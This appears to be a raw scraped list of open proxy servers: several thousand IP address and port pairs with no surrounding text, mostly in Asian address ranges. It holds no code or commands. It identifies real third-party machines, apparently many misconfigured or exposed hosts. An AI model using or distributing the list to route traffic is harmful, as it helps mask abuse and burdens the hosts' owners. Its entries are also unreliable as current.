116.203.64.214:9064 116.228.55.217:8003 116.228.80.186:8080 116.231.121.89:8080 116.236.216.116:8080 116.248.51.34:8585 116.73.146.128:9064 116.75.104.48:9064 116.75.96.188:9064 117.121.242.8:10080 117.121.242.8:11095 117.121.242.8:13243 117.121.242.8:13669 117.121.242.8:14826 117.121.242.8:15275 117.121.242.8:16442 117.121.242.8:16515 117.121.242.8:21725 117.121.242.8:23685 117.121.242.8:24379 117.121.242.8:29037 117.121.242.8:29832 117.121.242.8:33719 117.121.242.8:33925 117.121.242.8:33942 117.121.242.8:33976 117.121.242.8:34034 117.121.242.8:35010 117.135.194.139:86 117.135.194.52:80 117.135.194.53:80 117.135.194.55:80 117.135.244.41:80 117.139.2.9:8123 117.139.28.8:8123 117.139.29.25:8123 117.139.29.35:8123 117.139.36.253:8123 117.139.38.167:8123 117.139.39.206:8123 117.139.39.78:8123 117.139.39.83:8123 117.139.42.180:8123 117.139.43.31:8123 117.139.43.68:8123 117.139.45.195:8123 117.139.46.101:8123 117.139.46.11:8123 117.139.46.21:8123 117.139.68.186:8123 117.139.71.252:8123 117.146.116.67:80 117.146.116.68:80 117.147.224.12:8123 117.147.225.158:8123 117.148.44.6:8123 117.149.213.144:8123 117.149.239.59:8123 117.162.106.219:8123 117.162.106.237:8123 117.162.106.28:8123 117.162.106.34:8123 117.162.110.208:8123 117.162.116.206:8123 117.162.124.233:8123 117.162.125.55:8123 117.162.128.193:8123 117.162.15.135:8123 117.162.165.37:8123 117.162.166.147:8123 117.162.168.147:8123 117.162.169.63:8123 117.162.170.209:8123 117.162.170.5:8123 117.162.171.152:8123 117.162.171.169:8123 117.162.172.159:8123 117.162.191.229:8123 117.162.196.252:8123 117.162.196.70:8123 117.162.203.164:8123 117.162.204.138:8123 117.162.205.172:8123 117.162.205.233:8123 117.162.206.104:8123 117.162.206.37:8123 117.162.208.140:8123 117.162.212.63:8123 117.162.217.52:8123 117.162.221.43:8123 117.162.224.200:8123 117.162.226.15:8123 117.162.227.159:8123 117.162.233.178:8123 117.162.236.40:8123 117.162.238.150:8123 117.162.238.153:8123 117.162.239.71:8123 117.162.242.204:8123 117.162.243.43:8123 117.162.246.136:8123 117.162.250.248:8123 117.162.251.101:8123 117.162.252.105:8123 117.162.35.103:8123 117.162.43.229:8123 117.162.63.90:8123 117.162.80.151:8123 117.162.81.220:8123 117.162.83.22:8123 117.162.84.21:8123 117.162.85.88:8123 117.162.86.88:8123 117.162.94.124:8123 117.162.94.173:8123 117.162.94.32:8123 117.162.95.48:8123 117.163.100.230:8123 117.163.102.79:8123 117.163.104.13:8123 117.163.109.234:8123 117.163.11.233:8123 117.163.115.162:8123 117.163.118.147:8123 117.163.119.60:8123 117.163.120.72:8123 117.163.126.188:8123 117.163.127.52:8123 117.163.128.151:8123 117.163.128.45:8123 117.163.13.179:8123 117.163.13.203:8123 117.163.131.138:8123 117.163.144.204:8123 117.163.145.76:8123 117.163.148.95:8123 117.163.151.106:8123 117.163.151.188:8123 117.163.151.57:8123 117.163.153.115:8123 117.163.153.27:8123 117.163.155.40:8123 117.163.156.182:8123 117.163.156.231:8123 117.163.156.42:8123 117.163.157.85:8123 117.163.158.13:8123 117.163.158.20:8123 117.163.158.208:8123 117.163.159.20:8123 117.163.165.0:8123 117.163.166.140:8123 117.163.168.30:8123 117.163.170.239:8123 117.163.170.249:8123 117.163.170.44:8123 117.163.175.66:8123 117.163.178.148:8123 117.163.181.171:8123 117.163.185.12:8123 117.163.186.113:8123 117.163.188.151:8123 117.163.190.98:8123 117.163.191.104:8123 117.163.194.127:8123 117.163.195.161:8123 117.163.195.236:8123 117.163.196.68:8123 117.163.203.180:8123 117.163.205.155:8123 117.163.21.142:8123 117.163.21.44:8123 117.163.211.188:8123 117.163.212.206:8123 117.163.218.249:8123 117.163.22.128:8123 117.163.22.73:8123 117.163.221.20:8123 117.163.224.151:8123 117.163.226.108:8123 117.163.227.127:8123 117.163.228.236:8123 117.163.23.129:8123 117.163.231.252:8123 117.163.233.48:8123 117.163.234.145:8123 117.163.234.203:8123 117.163.237.102:8123 117.163.238.139:8123 117.163.241.105:8123 117.163.245.114:8123 117.163.247.176:8123 117.163.26.128:8123 117.163.26.133:8123 117.163.29.142:8123 117.163.29.64:8123 117.163.30.104:8123 117.163.30.83:8123 117.163.31.250:8123 117.163.49.188:8123 117.163.49.84:8123 117.163.55.111:8123 117.163.64.235:8123 117.163.65.218:8123 117.163.66.144:8123 117.163.67.10:8123 117.163.67.213:8123 117.163.69.39:8123 117.163.75.62:8123 117.163.96.38:8123 117.163.96.97:8123 117.163.97.100:8123 117.163.97.27:8123 117.164.1.226:8123 117.164.10.196:8123 117.164.11.113:8123 117.164.11.180:8123 117.164.110.181:8123 117.164.114.117:8123 117.164.122.133:8123 117.164.128.102:8123 117.164.128.34:8123 117.164.129.149:8123 117.164.129.158:8123 117.164.130.111:8123 117.164.130.180:8123 117.164.131.242:8123 117.164.132.5:8123 117.164.133.251:8123 117.164.139.132:8123 117.164.14.193:8123 117.164.141.69:8123 117.164.142.79:8123 117.164.142.97:8123 117.164.143.86:8123 117.164.144.196:8123 117.164.147.206:8123 117.164.157.159:8123 117.164.158.113:8123 117.164.159.198:8123 117.164.159.206:8123 117.164.159.70:8123 117.164.16.133:8123 117.164.162.159:8123 117.164.163.36:8123 117.164.166.249:8123 117.164.170.74:8123 117.164.172.17:8123 117.164.173.197:8123 117.164.174.181:8123 117.164.18.134:8123 117.164.18.23:8123 117.164.18.44:8123 117.164.183.252:8123 117.164.184.42:8123 117.164.185.228:8123 117.164.195.117:8123 117.164.198.234:8123 117.164.199.155:8123 117.164.201.9:8123 117.164.205.210:8123 117.164.209.177:8123 117.164.210.101:8123 117.164.213.254:8123 117.164.215.234:8123 117.164.216.150:8123 117.164.216.184:8123 117.164.218.169:8123 117.164.218.82:8123 117.164.220.235:8123 117.164.222.136:8123 117.164.232.71:8123 117.164.234.102:8123 117.164.235.158:8123 117.164.236.30:8123 117.164.240.224:8123 117.164.250.222:8123 117.164.250.51:8123 117.164.26.72:8123 117.164.28.208:8123 117.164.29.11:8123 117.164.31.111:8123 117.164.31.28:8123 117.164.38.11:8123 117.164.46.110:8123 117.164.46.127:8123 117.164.47.170:8123 117.164.51.69:8123 117.164.53.130:8123 117.164.53.47:8123 117.164.55.9:8123 117.164.59.96:8123 117.164.60.10:8123 117.164.61.218:8123 117.164.76.249:8123 117.164.8.7:8123 117.164.96.248:8123 117.164.98.247:8123 117.165.10.38:8123 117.165.101.119:8123 117.165.103.209:8123 117.165.11.240:8123 117.165.11.251:8123 117.165.110.33:8123 117.165.12.240:8123 117.165.121.181:8123 117.165.121.83:8123 117.165.122.25:8123 117.165.129.104:8123 117.165.129.110:8123 117.165.137.184:8123 117.165.140.129:8123 117.165.141.225:8123 117.165.146.252:8123 117.165.148.214:8123 117.165.149.34:8123 117.165.155.156:8123 117.165.157.79:8123 117.165.16.109:8123 117.165.162.234:8123 117.165.164.223:8123 117.165.167.86:8123 117.165.170.101:8123 117.165.171.77:8123 117.165.172.216:8123 117.165.177.74:8123 117.165.182.142:8123 117.165.187.168:8123 117.165.19.197:8123 117.165.192.36:8123 117.165.206.114:8123 117.165.210.207:8123 117.165.225.204:8123 117.165.228.175:8123 117.165.228.74:8123 117.165.229.11:8123 117.165.229.24:8123 117.165.231.171:8123 117.165.242.176:8123 117.165.29.120:8123 117.165.30.117:8123 117.165.31.103:8123 117.165.31.165:8123 117.165.37.62:8123 117.165.39.2:8123 117.165.39.8:8123 117.165.42.183:8123 117.165.45.199:8123 117.165.45.56:8123 117.165.47.56:8123 117.165.51.15:8123 117.165.64.53:8123 117.165.65.210:8123 117.165.69.110:8123 117.165.69.154:8123 117.165.70.212:8123 117.165.72.68:8123 117.165.72.89:8123 117.165.73.94:8123 117.165.77.26:8123 117.165.79.53:8123 117.165.87.197:8123 117.165.88.114:8123 117.165.9.76:8123 117.165.91.210:8123 117.165.99.55:8123 117.166.10.87:8123 117.166.103.198:8123 117.166.104.213:8123 117.166.105.220:8123 117.166.107.159:8123 117.166.108.147:8123 117.166.111.164:8123 117.166.114.248:8123 117.166.117.214:8123 117.166.121.14:8123 117.166.130.211:8123 117.166.14.249:8123 117.166.170.246:8123 117.166.18.211:8123 117.166.195.38:8123 117.166.196.137:8123 117.166.2.85:8123 117.166.20.130:8123 117.166.200.243:8123 117.166.200.64:8123 117.166.203.168:8123 117.166.203.83:8123 117.166.204.127:8123 117.166.206.135:8123 117.166.206.254:8123 117.166.206.92:8123 117.166.209.149:8123 117.166.210.200:8123 117.166.213.25:8123 117.166.214.199:8123 117.166.214.209:8123 117.166.217.100:8123 117.166.218.76:8123 117.166.219.218:8123 117.166.219.38:8123 117.166.22.114:8123 117.166.221.138:8123 117.166.221.174:8123 117.166.223.229:8123 117.166.223.245:8123 117.166.224.75:8123 117.166.225.107:8123 117.166.23.169:8123 117.166.23.208:8123 117.166.230.22:8123 117.166.232.245:8123 117.166.233.227:8123 117.166.233.36:8123 117.166.236.125:8123 117.166.241.178:8123 117.166.242.49:8123 117.166.244.230:8123 117.166.246.124:8123 117.166.246.227:8123 117.166.247.40:8123 117.166.33.233:8123 117.166.40.161:8123 117.166.41.145:8123 117.166.41.237:8123 117.166.42.233:8123 117.166.43.135:8123 117.166.44.226:8123 117.166.46.145:8123 117.166.49.91:8123 117.166.50.127:8123 117.166.51.154:8123 117.166.53.50:8123 117.166.53.73:8123 117.166.56.129:8123 117.166.64.38:8123 117.166.65.107:8123 117.166.65.3:8123 117.166.66.75:8123 117.166.67.136:8123 117.166.73.15:8123 117.166.77.102:8123 117.166.79.218:8123 117.166.79.40:8123 117.166.79.70:8123 117.166.81.194:8123 117.166.82.46:8123 117.166.84.196:8123 117.166.84.237:8123 117.166.84.90:8123 117.166.85.96:8123 117.166.88.121:8123 117.166.9.176:8123 117.166.9.91:8123 117.166.90.30:8123 117.166.91.26:8123 117.166.91.7:8123 117.166.92.143:8123 117.166.92.192:8123 117.166.92.197:8123 117.166.93.163:8123 117.166.93.168:8123 117.166.94.194:8123 117.166.97.203:8123 117.166.98.89:8123 117.166.98.96:8123 117.166.99.104:8123 117.167.1.124:8123 117.167.132.204:8123 117.167.133.244:8123 117.167.14.96:8123 117.167.140.13:8123 117.167.152.123:8123 117.167.160.109:8123 117.167.161.106:8123 117.167.162.139:8123 117.167.162.28:8123 117.167.164.93:8123 117.167.168.223:8123 117.167.175.118:8123 117.167.18.13:8123 117.167.182.20:8123 117.167.183.180:8123 117.167.184.35:8123 117.167.21.235:8123 117.167.213.44:8123 117.167.223.41:8123 117.167.225.171:8123 117.167.228.102:8123 117.167.23.98:8123 117.167.231.227:8123 117.167.235.143:8123 117.167.235.226:8123 117.167.237.151:8123 117.167.244.195:8123 117.167.25.131:8123 117.167.26.43:8123 117.167.28.186:8123 117.167.3.232:8123 117.167.3.74:8123 117.167.32.241:8123 117.167.35.250:8123 117.167.39.235:8123 117.167.39.50:8123 117.167.42.28:8123 117.167.47.119:8123 117.167.47.245:8123 117.167.55.219:8123 117.167.61.1:8123 117.167.68.103:8123 117.167.69.211:8123 117.167.70.210:8123 117.167.70.29:8123 117.167.70.84:8123 117.167.71.87:8123 117.167.77.99:8123 117.167.95.171:8123 117.168.129.99:8123 117.168.237.180:8123 117.169.142.135:8123 117.169.144.215:8123 117.169.144.22:8123 117.169.157.221:8123 117.169.161.115:8123 117.169.163.14:8123 117.169.167.123:8123 117.169.187.136:8123 117.169.187.15:8123 117.169.187.99:8123 117.169.191.69:8123 117.169.196.112:8123 117.169.197.124:8123 117.169.201.103:8123 117.169.202.2:8123 117.169.203.148:8123 117.169.204.252:8123 117.169.205.66:8123 117.169.206.183:8123 117.169.206.224:8123 117.169.207.225:8123 117.169.225.255:8123 117.169.230.11:8123 117.169.231.201:8123 117.169.232.88:8123 117.169.233.237:8123 117.169.233.71:8123 117.169.236.178:8123 117.169.238.235:8123 117.169.239.29:8123 117.169.245.184:8123 117.169.249.149:8123 117.169.251.46:8123 117.169.64.4:80 117.170.10.30:8123 117.170.103.173:8123 117.170.103.200:8123 117.170.105.64:8123 117.170.113.192:8123 117.170.122.168:8123 117.170.124.105:8123 117.170.125.232:8123 117.170.125.26:8123 117.170.129.53:8123 117.170.132.147:8123 117.170.135.195:8123 117.170.137.167:8123 117.170.138.8:8123 117.170.14.25:8123 117.170.140.200:8123 117.170.142.158:8123 117.170.152.127:8123 117.170.155.58:8123 117.170.163.148:8123 117.170.164.81:8123 117.170.166.119:8123 117.170.17.24:8123 117.170.172.119:8123 117.170.172.167:8123 117.170.172.49:8123 117.170.176.193:8123 117.170.176.20:8123 117.170.177.244:8123 117.170.177.38:8123 117.170.179.176:8123 117.170.20.143:8123 117.170.202.37:8123 117.170.202.74:8123 117.170.204.69:8123 117.170.205.60:8123 117.170.21.95:8123 117.170.210.39:8123 117.170.211.60:8123 117.170.214.249:8123 117.170.215.82:8123 117.170.216.102:8123 117.170.218.88:8123 117.170.223.118:8123 117.170.223.185:8123 117.170.226.15:8123 117.170.226.99:8123 117.170.23.0:8123 117.170.23.28:8123 117.170.23.50:8123 117.170.233.38:8123 117.170.233.85:8123 117.170.236.95:8123 117.170.239.39:8123 117.170.242.245:8123 117.170.248.24:8123 117.170.248.45:8123 117.170.252.140:8123 117.170.252.2:8123 117.170.252.49:8123 117.170.254.213:8123 117.170.254.74:8123 117.170.255.11:8123 117.170.255.249:8123 117.170.255.94:8123 117.170.32.145:8123 117.170.32.78:8123 117.170.33.38:8123 117.170.40.172:8123 117.170.41.70:8123 117.170.43.30:8123 117.170.43.46:8123 117.170.5.254:8123 117.170.55.90:8123 117.170.59.179:8123 117.170.8.23:8123 117.170.8.51:8123 117.170.91.52:8123 117.171.105.17:8123 117.171.105.30:8123 117.171.112.71:8123 117.171.115.129:8123 117.171.116.114:8123 117.171.117.91:8123 117.171.124.23:8123 117.171.132.249:8123 117.171.132.60:8123 117.171.136.102:8123 117.171.140.185:8123 117.171.140.198:8123 117.171.141.41:8123 117.171.144.105:8123 117.171.144.118:8123 117.171.144.57:8123 117.171.146.24:8123 117.171.151.236:8123 117.171.152.15:8123 117.171.152.254:8123 117.171.153.127:8123 117.171.162.159:8123 117.171.164.208:8123 117.171.166.217:8123 117.171.174.221:8123 117.171.175.252:8123 117.171.175.43:8123 117.171.188.133:8123 117.171.19.112:8123 117.171.19.174:8123 117.171.193.129:8123 117.171.199.170:8123 117.171.200.178:8123 117.171.204.176:8123 117.171.206.71:8123 117.171.207.206:8123 117.171.216.212:8123 117.171.223.240:8123 117.171.224.160:8123 117.171.224.220:8123 117.171.226.129:8123 117.171.230.164:8123 117.171.233.219:8123 117.171.234.134:8123 117.171.234.173:8123 117.171.235.124:8123 117.171.236.73:8123 117.171.239.110:8123 117.171.24.65:8123 117.171.242.130:8123 117.171.244.160:8123 117.171.244.90:8123 117.171.249.190:8123 117.171.250.128:8123 117.171.251.238:8123 117.171.26.219:8123 117.171.27.62:8123 117.171.35.63:8123 117.171.37.86:8123 117.171.46.212:8123 117.171.52.250:8123 117.171.55.156:8123 117.171.56.49:8123 117.171.58.200:8123 117.171.59.131:8123 117.171.59.217:8123 117.171.72.173:8123 117.171.74.148:8123 117.171.76.121:8123 117.171.77.43:8123 117.171.77.99:8123 117.171.78.220:8123 117.171.85.130:8123 117.172.148.43:8123 117.172.220.97:8123 117.172.77.243:8123 117.172.77.72:8123 117.172.98.170:8123 117.173.106.216:8123 117.173.107.198:8123 117.173.107.202:8123 117.173.108.188:8123 117.173.108.217:8123 117.173.108.92:8123 117.173.18.232:8123 117.173.191.128:8123 117.173.191.237:8123 117.173.20.155:8123 117.173.20.199:8123 117.173.20.26:8123 117.173.20.65:8123 117.173.200.90:8123 117.173.204.134:8123 117.173.21.248:8123 117.173.22.151:8123 117.173.23.168:8123 117.173.23.200:8123 117.173.240.205:8123 117.173.241.127:8123 117.173.242.118:8123 117.173.242.46:8123 117.173.245.33:8123 117.173.254.100:8123 117.173.254.135:8123 117.173.254.166:8123 117.173.254.204:8123 117.173.254.231:8123 117.173.254.43:8123 117.173.254.99:8123 117.173.57.77:8123 117.173.58.218:8123 117.173.58.35:8123 117.173.59.117:8123 117.173.61.202:8123 117.173.62.219:8123 117.173.63.173:8123 117.173.81.225:8123 117.173.82.94:8123 117.174.174.186:8123 117.174.192.34:8123 117.174.192.87:8123 117.174.193.243:8123 117.174.193.25:8123 117.174.196.4:8123 117.174.197.140:8123 117.174.197.65:8123 117.174.198.154:8123 117.174.198.2:8123 117.174.198.24:8123 117.174.199.169:8123 117.174.2.17:8123 117.174.200.60:8123 117.174.201.120:8123 117.174.203.152:8123 117.174.203.40:8123 117.174.203.8:8123 117.174.206.182:8123 117.174.207.171:8123 117.174.227.210:8123 117.174.3.252:8123 117.175.108.22:8123 117.175.109.102:8123 117.175.109.103:8123 117.175.109.43:8123 117.175.110.172:8123 117.175.110.175:8123 117.175.111.153:8123 117.175.111.223:8123 117.175.116.173:8123 117.175.118.110:8123 117.175.118.242:8123 117.175.118.49:8123 117.175.119.60:8123 117.175.120.36:8123 117.175.194.15:8123 117.175.215.62:8123 117.175.225.166:8123 117.175.225.57:8123 117.175.226.174:8123 117.175.226.211:8123 117.175.228.19:8123 117.175.228.242:8123 117.175.228.85:8123 117.175.229.11:8123 117.175.229.169:8123 117.175.229.180:8123 117.175.230.54:8123 117.175.230.6:8123 117.175.231.12:8123 117.175.231.201:8123 117.175.231.237:8123 117.175.231.88:8123 117.175.239.141:8123 117.175.239.21:8123 117.175.240.10:8123 117.175.240.37:8123 117.175.242.163:8123 117.175.242.66:8123 117.175.243.123:8123 117.175.243.14:8123 117.175.243.154:8123 117.175.243.39:8123 117.175.243.59:8123 117.175.243.83:8123 117.175.33.181:8123 117.175.34.159:8123 117.175.34.242:8123 117.175.35.121:8123 117.175.36.127:8123 117.175.36.182:8123 117.175.37.227:8123 117.175.38.251:8123 117.175.44.65:8123 117.175.61.169:8123 117.175.62.58:8123 117.175.63.11:8123 117.176.0.78:8123 117.176.1.193:8123 117.176.105.152:8123 117.176.108.201:8123 117.176.109.106:8123 117.176.109.120:8123 117.176.110.93:8123 117.176.184.53:8123 117.176.184.80:8123 117.176.185.241:8123 117.176.188.165:8123 117.176.188.217:8123 117.176.235.156:8123 117.176.26.250:8123 117.176.28.84:8123 117.194.218.137:9064 117.194.32.172:9064 117.194.80.20:9064 117.196.240.129:9064 117.199.252.188:9064 117.201.120.39:9064 117.205.30.61:9064 117.208.78.130:9064 117.21.192.10:80 117.21.192.8:80 117.218.50.134:6588 117.220.146.164:9064 117.239.44.147:9064 117.254.228.73:9064 117.35.127.213:8585 117.35.145.74:8123 118.137.81.138:9064 118.144.50.254:3128 118.160.129.225:9064 118.160.47.101:9064 118.161.53.220:9064 118.167.114.147:9064 118.167.155.55:9064 118.167.157.220:9064 118.167.69.146:9064 118.168.129.78:9064 118.168.166.52:8088 118.169.37.157:8088 118.169.87.246:9064 118.169.93.248:8088 118.171.160.67:9064 118.171.206.103:9064 118.171.74.199:9064 118.174.189.141:8080 118.180.39.249:18186 118.244.213.6:3128 118.26.142.5:80 118.26.147.119:80 118.97.131.34:8080 118.97.66.4:8080 118.97.95.182:8080 119.188.94.145:80 119.190.35.154:8080 119.226.169.98:8000 119.4.115.51:8090 119.40.97.2:8080 119.40.98.26:8080 119.42.156.117:9064 119.46.201.251:3128 119.6.136.126:80 119.6.136.126:81 119.6.136.126:82 119.6.136.126:843 119.6.144.70:81 119.6.144.70:82 119.6.144.70:83 119.6.144.70:843 119.6.144.73:80 119.6.144.73:81 119.6.144.73:82 119.6.144.73:83 119.6.144.73:843 119.6.144.74:80 119.6.144.74:81 119.6.144.74:82 119.6.144.74:83 119.6.144.74:843 119.6.144.78:82 119.6.144.78:83 119.77.163.89:9064 119.80.160.50:80 119.81.199.81:80 119.81.199.82:3128 119.81.199.82:80 119.81.199.85:3128 119.82.81.216:9064 119.90.127.2:80 120.126.129.82:9064 120.126.40.220:9064 120.131.128.210:80 120.131.128.210:86 120.131.128.211:80 120.132.55.230:80 120.193.146.95:80 120.193.146.95:81 120.193.146.95:83 120.193.63.243:8123 120.195.172.9:8123 120.195.232.53:8123 120.198.243.111:80 120.198.243.113:80 120.198.243.114:80 120.198.243.115:8888 120.198.243.116:80 120.198.243.118:80 120.198.243.130:80 120.198.243.131:80 120.198.243.14:80 120.198.243.15:80 120.198.243.151:80 120.198.243.48:80 120.198.243.50:80 120.198.243.51:80 120.198.243.52:80 120.198.243.53:80 120.198.243.54:80 120.198.243.78:80 120.198.243.79:80 120.198.243.79:81 120.198.243.82:80 120.198.243.83:80 120.198.243.86:80 120.199.246.240:8123 120.199.247.93:8123 120.199.252.77:8123 120.202.249.230:80 120.203.11.21:8123 120.203.155.170:8123 120.203.155.195:8123 120.203.160.109:8123 120.203.168.204:8123 120.203.178.116:8123 120.203.214.187:80 120.203.214.187:9090 120.203.215.11:80 120.203.215.11:81 120.203.215.19:80 120.203.232.129:8123 120.203.234.171:8123 120.203.234.30:8123 120.203.235.155:8123 120.203.236.110:8123 120.203.236.247:8123 120.203.237.196:8123 120.203.238.43:8123 120.203.240.248:8123 120.203.244.148:8123 120.203.248.173:8123 120.203.250.249:8123 120.203.26.23:8123 120.206.101.110:8123 120.206.105.149:8123 120.206.109.155:8123 120.206.111.217:8123 120.206.112.28:8123 120.206.132.148:8123 120.206.132.3:8123 120.206.133.38:8123 120.206.137.10:8123 120.206.138.36:8123 120.206.144.226:8123 120.206.146.55:8123 120.206.147.119:8123 120.206.148.68:8123 120.206.151.76:8123 120.206.168.2:8123 120.206.168.243:8123 120.206.171.66:8123 120.206.172.209:8123 120.206.176.235:8123 120.206.176.253:8123 120.206.177.186:8123 120.206.179.113:8123 120.206.182.217:8123 120.206.185.23:8123 120.206.186.5:8123 120.206.191.77:8123 120.206.192.172:8123 120.206.193.115:8123 120.206.193.14:8123 120.206.193.94:8123 120.206.195.237:8123 120.206.195.6:8123 120.206.196.250:8123 120.206.196.8:8123 120.206.196.81:8123 120.206.197.176:8123 120.206.197.35:8123 120.206.202.194:8123 120.206.203.181:8123 120.206.212.59:8123 120.206.222.146:8123 120.206.224.148:8123 120.206.229.68:8123 120.206.232.204:8123 120.206.234.230:8123 120.206.237.227:8123 120.206.72.51:8123 120.206.73.216:8123 120.206.74.34:8123 120.206.75.72:8123 120.206.76.207:8123 120.206.77.215:8123 120.206.79.74:8123 121.10.252.139:3128 121.14.138.56:81 121.199.31.240:3128 121.207.252.105:3128 122.100.82.107:9064 122.117.218.150:9064 122.118.162.51:9064 122.118.165.99:8088 122.118.177.115:8088 122.118.227.85:8088 122.121.109.60:9064 122.121.250.162:9064 122.146.195.232:3128 122.146.227.171:9064 122.180.149.231:9064 122.224.155.163:80 122.225.106.35:80 122.225.106.36:80 122.225.106.40:80 122.227.135.115:8085 122.232.29.2:80 122.88.118.235:8123 123.0.196.150:9064 123.125.19.44:80 123.150.68.132:80 123.161.150.90:8585 123.163.125.2:9000 123.177.20.220:80 123.190.46.20:8080 123.193.9.223:9064 123.194.137.40:9064 123.194.236.9:9064 123.195.177.215:9064 123.201.150.146:9064 123.201.72.101:9064 123.201.77.120:9064 123.205.79.139:9064 123.235.31.155:8080 123.236.146.239:9064 123.238.13.43:9064 123.240.45.201:9064 123.240.5.32:9064 123.30.75.115:3128 123.30.75.115:443 123.30.75.115:80 124.106.167.107:8080 124.12.56.24:9064 124.123.174.127:9064 124.123.211.191:9064 124.124.164.11:9064 124.125.72.146:9064 124.130.18.138:8585 124.161.94.8:80 124.164.144.176:8585 124.192.148.133:80 124.192.148.14:8080 124.192.60.117:80 124.231.136.6:8080 124.8.224.247:9064 124.88.67.40:83 124.9.194.57:9064 124.9.200.95:9064 125.209.115.218:8080 125.214.163.2:8080 125.224.116.215:9064 125.224.182.33:9064 125.230.158.226:9064 125.231.217.215:9064 125.231.81.148:9064 125.24.78.136:80 125.39.66.66:80 125.39.66.67:80 125.39.66.68:80 125.41.41.44:8118 125.46.252.50:8118 125.88.255.143:80 125.88.255.144:80 128.199.151.72:3128 128.199.172.110:3128 128.199.206.219:3128 128.199.45.155:3128 129.22.150.159:3128 130.14.29.111:80 130.14.29.120:80 130.180.6.238:3128 131.100.188.18:8080 131.109.42.105:80 139.193.201.190:9064 14.109.233.44:8585 14.20.176.243:8888 14.96.101.242:9064 14.96.26.124:9064 14.96.36.41:9064 14.96.42.51:9064 14.96.68.127:9064 14.96.88.161:9064 14.96.96.137:9064 14.97.10.62:9064 14.97.111.178:9064 14.97.50.13:9064 14.98.115.27:9064 14.99.115.13:9064 14.99.45.85:9064 140.115.200.125:9064 140.117.170.164:3128 140.127.32.88:9064 141.0.170.166:3128 144.76.123.38:8080 147.47.106.35:1920 150.187.146.14:8080 162.208.49.45:7808 162.208.49.45:8089 162.219.6.55:3128 162.220.10.192:8000 162.220.52.175:7808 162.220.52.175:8089 162.242.166.243:3128 163.177.79.4:80 163.177.79.5:80 167.205.46.5:8080 168.63.120.102:80 171.12.1.243:81 171.92.207.58:80 173.192.21.89:8080 173.193.31.64:3128 173.193.31.67:3128 173.201.183.172:8000 173.201.185.40:80 173.239.14.54:80 173.239.14.59:80 173.239.17.187:80 175.106.18.222:8080 175.180.80.172:9064 175.182.26.93:9064 175.182.31.116:8088 176.31.188.212:3128 177.10.250.18:3128 177.102.141.170:3128 177.103.176.39:3128 177.135.30.11:8080 178.32.72.26:7808 178.32.72.26:8089 180.153.100.242:80 182.239.127.137:80 182.239.127.140:80 182.239.95.139:80 182.93.224.14:8080 183.203.208.177:8118 183.203.22.182:85 183.203.22.183:80 183.203.22.183:85 183.203.22.184:80 183.203.22.68:80 183.203.22.90:80 183.203.22.91:80 183.203.22.96:80 183.203.22.97:80 183.203.8.147:8080 183.203.8.148:8080 183.207.224.12:80 183.207.224.13:80 183.207.224.14:80 183.207.224.15:80 183.207.224.42:80 183.207.224.43:80 183.207.224.44:80 183.207.224.45:80 183.207.224.46:80 183.207.224.47:80 183.207.224.48:80 183.207.224.49:80 183.207.224.50:81 183.207.224.50:85 183.207.224.51:83 183.207.224.51:84 183.207.224.52:81 183.207.229.14:80 183.207.237.18:80 183.207.237.18:81 183.208.222.136:8123 183.208.241.103:8123 183.208.50.128:8123 183.209.110.90:8123 183.209.17.245:8123 183.210.53.239:8123 183.211.1.68:8123 183.211.116.30:8123 183.211.126.240:8123 183.211.197.160:8123 183.211.74.69:8123 183.211.83.251:8123 183.212.136.31:8123 183.212.153.29:8123 183.212.8.19:8123 183.216.112.37:8123 183.219.153.10:8123 183.219.31.136:8123 183.219.50.62:8123 183.219.8.93:8123 183.219.84.203:8123 183.219.87.192:8123 183.219.90.36:8123 183.219.93.49:8123 183.220.193.203:8123 183.220.194.84:8123 183.220.199.20:8123 183.220.199.246:8123 183.220.228.5:8123 183.220.234.124:8123 183.220.234.135:8123 183.220.234.167:8123 183.220.234.242:8123 183.220.235.170:8123 183.220.240.76:8123 183.220.241.248:8123 183.220.246.167:8123 183.220.247.132:8123 183.220.247.143:8123 183.220.247.177:8123 183.220.44.253:8123 183.220.46.183:8123 183.220.46.94:8123 183.221.160.70:8123 183.221.162.79:8123 183.221.175.126:8123 183.221.184.228:8123 183.221.186.28:8123 183.222.103.58:8123 183.222.152.121:8123 183.222.152.14:8123 183.222.152.147:8123 183.222.152.167:8123 183.222.152.171:8123 183.222.152.254:8123 183.222.152.61:8123 183.222.153.11:8123 183.222.153.161:8123 183.222.157.51:8123 183.222.158.127:8123 183.222.158.90:8123 183.222.159.109:8123 183.222.159.98:8123 183.222.164.219:8123 183.222.171.79:8123 183.223.154.14:8123 183.223.17.25:8123 183.223.194.235:8123 183.223.209.170:8123 183.223.210.195:8123 183.223.210.76:8123 183.223.212.167:8123 183.223.218.58:8123 183.223.242.249:8123 183.223.243.180:8123 183.223.243.226:8123 183.223.30.172:8123 183.223.32.85:8123 183.223.34.193:8123 183.223.37.149:8123 183.223.38.114:8123 183.223.38.13:8123 183.223.38.146:8123 183.223.41.214:8123 183.223.41.38:8123 183.223.41.80:8123 183.224.1.30:80 183.224.12.81:80 183.224.12.82:80 183.227.177.216:8123 183.227.217.146:8123 183.227.252.15:8123 183.227.253.52:8123 183.227.253.65:8123 183.227.29.108:8123 183.228.10.157:8123 183.228.107.99:8123 183.228.139.19:8123 183.228.150.99:8123 183.228.168.178:8123 183.228.176.236:8123 183.228.177.134:8123 183.228.177.153:8123 183.228.180.133:8123 183.228.181.146:8123 183.228.182.104:8123 183.228.182.223:8123 183.228.182.86:8123 183.228.183.240:8123 183.228.197.118:8123 183.228.197.120:8123 183.228.197.79:8123 183.228.198.215:8123 183.228.198.67:8123 183.228.199.148:8123 183.228.200.25:8123 183.228.201.222:8123 183.228.205.183:8123 183.228.217.19:8123 183.228.220.128:8123 183.228.220.138:8123 183.228.222.172:8123 183.228.223.18:8123 183.228.246.77:8123 183.228.250.82:8123 183.228.251.190:8123 183.228.70.225:8123 183.63.116.43:9999 183.83.245.199:9064 183.83.31.72:9064 183.83.33.171:9064 183.87.26.139:9064 183.95.152.141:80 183.95.152.141:8080 183.95.152.141:8091 185.37.226.107:19350 185.37.226.184:18080 185.73.170.20:8080 186.101.82.74:3128 186.14.11.219:9064 186.14.197.7:9064 186.14.39.118:9064 186.14.56.221:9064 186.208.122.235:8080 186.219.118.134:9064 186.224.64.102:3128 186.88.101.186:8080 186.88.103.24:8080 186.88.104.37:9064 186.88.108.247:9064 186.88.109.37:9064 186.88.109.60:8080 186.88.109.8:8080 186.88.111.151:9064 186.88.111.185:8080 186.88.122.181:9064 186.88.161.74:9064 186.88.162.99:8080 186.88.170.127:8080 186.88.172.205:9064 186.88.175.149:8080 